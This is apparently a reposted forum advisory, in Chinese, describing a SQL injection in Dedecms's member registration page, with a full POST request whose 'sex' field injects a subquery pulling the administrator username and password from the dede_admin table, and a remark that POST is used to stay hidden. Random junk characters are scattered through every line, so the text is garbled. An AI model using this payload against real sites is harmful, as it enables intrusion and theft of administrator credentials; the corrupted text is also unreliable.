漏洞类型: SQL注射漏洞
& b& o/ J. u2 I0 W2 a简要描述:
7 |4 L. G8 b( e9 i! u0 x
- e3 p: O! R) \' |( F需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.3 G; l- M9 m) H2 N4 [
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.0 _ l8 }7 C$ ?6 S: |5 x' A9 i3 Z
详细说明:跟这个漏洞0 Q8 ?! x+ o2 A) ^- P
( X5 W- C, ?8 A# C2 ]
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
; b y; Q& Y; f) U是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
. z( q% \4 X$ I, v. K2 T) Z: _POST提交以下数据,其实不用POST提交的,这样隐蔽点.
" Y5 b. e4 n8 r* n
/ h7 l# k9 J, d, s) F! twww.political-security.com/member/reg_new.php
6 L+ ^& N' T! o- E6 V" B ' D2 K5 w6 K" P# H/ w) g6 l' |
POST
. R" m4 a5 z" [ . V3 I7 a" x# ~
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
0 e, w$ i( c7 U+ x# ruserid=c4rp3nt3r&uname=c4rp3nt3r4 ^/ s" I5 f, V. P6 W s; q
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss1 d. ~7 b6 Z7 s
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,* r( ~. n* _# Z$ @7 i
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
9 R5 M% U& v, a7 g! H! P! z%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对